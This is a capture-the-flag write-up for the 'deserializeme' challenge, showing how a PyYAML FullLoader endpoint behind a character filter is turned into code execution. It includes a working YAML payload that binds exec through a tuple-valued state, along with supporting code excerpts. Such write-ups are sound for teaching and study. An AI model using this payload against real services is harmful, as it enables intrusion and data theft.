# deserializeme
In this challenge, we're linked a website as well as its Flask backend. It consists of a single route that loads a YAML file we provide in the request body:
```python
@app.route('/', methods=["POST"])
def pwnme():
    if not re.fullmatch(b"^[\n --/-\]a-}]*$", request.data, flags=re.MULTILINE):
        return "Nice try!", 400
    return yaml.load(request.data)
```
Before anything else, I verified that the endpoint worked as intended. My template for sending a YAML file and printing the response:
```python
import requests

# Send the payload file as the raw request body.
with open('payload.yaml', 'rb') as f:
    r = requests.post('https://deserializeme.chal.uiuc.tf/', data=f.read())
print(r.text)  # {"hello":"world","number":9}
```
## Vulnerability
PyYAML is well known for unsafe deserialization, mainly because it supports all sorts of interaction with Python objects. I'll reference its [documentation](https://pyyaml.org/wiki/PyYAMLDocumentation#yaml-tags-and-python-types) throughout the writeup.
However, there are two restrictions to keep in mind. First, `yaml.load` uses `FullLoader` by default, which bans the `!!python/object/apply` tag among other things. This means that we can't call arbitrary functions like `eval` directly, although we can still construct class instances with the `!!python/object/new` tag.
Second, this challenge uses a regex filter. Among printable ASCII characters, it rejects the following:
* Periods
* Carets
* Underscores
* Backticks
* Tildes
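To double-check which characters the filter rejects, the following sketch runs the challenge's character class over every printable ASCII byte. The names `pattern` and `banned` are mine, and only printable ASCII is tested here; control characters other than newline and all non-ASCII bytes fall outside the class as well.

```python
import re

# Same pattern as the challenge, written as a raw bytes literal.
# (Python may emit a FutureWarning about `--`; matching is unaffected.)
pattern = rb"^[\n --/-\]a-}]*$"

banned = []
for code in range(0x20, 0x7F):  # printable ASCII only
    if not re.fullmatch(pattern, bytes([code]), flags=re.MULTILINE):
        banned.append(chr(code))

print(" ".join(banned))  # . ^ _ ` ~
```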
Banning periods prevents us from accessing objects in other modules, which are specified in the `<module>.<name>` format. Fortunately, PyYAML falls back to the `builtins` module if the name contains no period. I'm not sure if this is in the documentation, but the [source code](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L540) confirms it:
```python
def find_python_name(self, name, mark, unsafe=False):
    if not name:
        raise ConstructorError("while constructing a Python object", mark,
                "expected non-empty name appended to the tag", mark)
    if '.' in name:
        module_name, object_name = name.rsplit('.', 1)
    else:
        module_name = 'builtins'
        object_name = name
```
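The fallback is easy to mimic outside PyYAML. This is a simplified sketch rather than the library's code: `resolve_name` is a hypothetical helper, and it imports modules freely, whereas the real method performs additional checks before returning anything.

```python
import importlib


def resolve_name(name):
    """Hypothetical helper mirroring the name-splitting logic shown above."""
    if '.' in name:
        module_name, object_name = name.rsplit('.', 1)
    else:
        # No period in the name: fall back to the builtins module.
        module_name, object_name = 'builtins', name
    module = importlib.import_module(module_name)
    return getattr(module, object_name)


print(resolve_name('exec') is exec)        # True: no period needed
print(resolve_name('os.getcwd').__name__)  # getcwd
```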
To summarize, we can construct and reference built-in objects, but we can't call functions directly. Our goal is still arbitrary code execution.
## Exploit
This is the format for specifying class construction, as per the [documentation](https://pyyaml.org/wiki/PyYAMLDocumentation#objects):
```yaml
!!python/object/new:module.Class
args: [argument, ...]
kwds: {key: value, ...}
state: ...
listitems: [item, ...]
dictitems: [key: value, ...]
```
Right away, I was interested in the `state` field. It turns out that PyYAML uses it to add arbitrary attributes to an object after it's constructed! This won't work for most built-in types, since their instances don't accept new attributes. Fortunately, some classes are writable: `Warning`, the `Error` types, etc. Hence the following creates an object where `obj.hello == 'world'`:
```yaml
!!python/object/new:Warning
state:
  hello: 'world'
```
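The difference between the two kinds of built-ins is easy to see in plain Python, without PyYAML involved. A small sketch:

```python
w = Warning()
w.hello = 'world'      # exception instances carry a __dict__
print(w.hello)         # world

s = str()
try:
    s.hello = 'world'  # str instances have no __dict__
except AttributeError as err:
    print('str rejected the attribute:', err)

print(hasattr(w, '__dict__'), hasattr(s, '__dict__'))  # True False
```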
Not every attribute can be set, however. PyYAML calls `check_state_key` on each key, which matches it against a blacklist regex. Keys of the form `__something__` are banned, which makes some sense. Interestingly, the key `extend` is also banned. PyYAML justifies this in the [source code](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L483):
> `extend` is blacklisted because it is used by construct_python_object_apply to add `listitems` to a newly generate python instance
Let's look at the `construct_python_object_apply` method for clarification:
```python
if state:
    self.set_python_instance_state(instance, state)
if listitems:
    instance.extend(listitems)
if dictitems:
    for key in dictitems:
        instance[key] = dictitems[key]
return instance
```
Notice that if there were no blacklist, this payload would give RCE:
```yaml
!!python/object/new:Warning
state:
  extend: !!python/name:exec
listitems: 'whatever python code we want'
```
We first set `extend` to the built-in `exec` function, using the `!!python/name` tag. Since `extend` now lives on the instance rather than on the class, `instance.extend` is a plain function that receives no `self`, and PyYAML subsequently calls it on `listitems` - a code string! We've essentially created an object that 'spoofs' a list.
In general, this bug exists whenever code assumes the type of an object we provide and then calls one of its methods with an argument we also control. I spent a lot of time looking for this scenario in the Flask source code, but I ended up finding one in PyYAML - coincidentally in the function which sets state. Here's the [source](https://github.com/yaml/pyyaml/blob/master/lib3/yaml/constructor.py#L595):
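The spoofing idea works independently of YAML. In this sketch a `Warning` instance stands in for the list, and `calls.append` is a harmless stand-in for `exec` (both names are illustrative only):

```python
calls = []

fake_list = Warning()
# Stored on the instance, so Python does not pass `fake_list` as `self`.
fake_list.extend = calls.append  # the payload would store exec here

listitems = 'whatever python code we want'
fake_list.extend(listitems)      # what PyYAML does when listitems is set

print(calls)  # ['whatever python code we want']
```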
```python
def set_python_instance_state(self, instance, state, unsafe=False):
    if hasattr(instance, '__setstate__'):
        instance.__setstate__(state)
    else:
        slotstate = {}
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if hasattr(instance, '__dict__'):
            if not unsafe and state:
                for key in state.keys():
                    self.check_state_key(key)
            instance.__dict__.update(state)
        elif state:
            slotstate.update(state)
        for key, value in slotstate.items():
            if not unsafe:
                self.check_state_key(key)
            setattr(instance, key, value)
```
Notice that `slotstate` is assumed to be a dictionary. Yet if `state` is a tuple, the code destructures it into `(state, slotstate)`. Since no other type checks are performed, we have full control over both objects! In particular, this lets us exploit `slotstate.update(state)`.
We want `slotstate` to be a dummy object whose `update` attribute points to `exec`. Hence `state` should be a tuple containing a code string and the dummy object, in that order. One final caveat: in order to reach the `elif` block, our outer class instance cannot have a `__setstate__` method or a `__dict__` attribute - a built-in type like `str` works. Here's a payload which prints the flag:
```yaml
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
  state:
    update: !!python/name:exec
```
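To see why this reaches `slotstate.update(state)`, here is a local simulation of the `else` branch. It is a sketch under assumptions: `set_state_sketch` is a hypothetical copy of the logic with the key checks left out, and `executed.append` is a harmless stand-in for `exec`.

```python
def set_state_sketch(instance, state):
    """Hypothetical, simplified copy of the else branch (no key checks)."""
    slotstate = {}
    if isinstance(state, tuple) and len(state) == 2:
        state, slotstate = state       # both halves are attacker-controlled
    if hasattr(instance, '__dict__'):
        instance.__dict__.update(state)
    elif state:
        slotstate.update(state)        # the call we hijack
    for key, value in slotstate.items():
        setattr(instance, key, value)


executed = []
spoofed = Warning()
spoofed.update = executed.append       # the payload stores exec here

try:
    set_state_sketch(str(), ("print('pwned')", spoofed))
except AttributeError:
    # slotstate.items() fails afterwards, but update() has already run.
    pass

print(executed)  # ["print('pwned')"]
```

The later failure on `items()` doesn't matter for the attack, since the hijacked call happens first.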
A few more notes:
* Since periods are banned, I escaped the one in the filename as `\x2e`. Note that it's Python's parser inside `exec`, not YAML, that interprets the hex escape: single-quoted YAML scalars leave backslashes untouched.
* In order to access object attributes and methods without periods, I used `getattr`.
* The easiest way to exfiltrate from the server is to make an HTTP request containing the flag. This is left as an exercise to the reader :smile:
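
The first two notes can be checked locally with a harmless expression. In this sketch, `scalar` is a hypothetical stand-in for the text PyYAML hands to Python after parsing a single-quoted scalar, and `eval` replaces `exec` so that the result can be inspected:

```python
# Single-quoted YAML scalars keep backslashes literally, so Python receives
# the four characters \x2e rather than a period.
scalar = r'getattr("flag\x2etxt", "upper")()'
assert '.' not in scalar

# Python's own parser expands \x2e when it compiles the string literal,
# and getattr reaches the method without attribute-access syntax.
result = eval(scalar)
print(result)  # FLAG.TXT
```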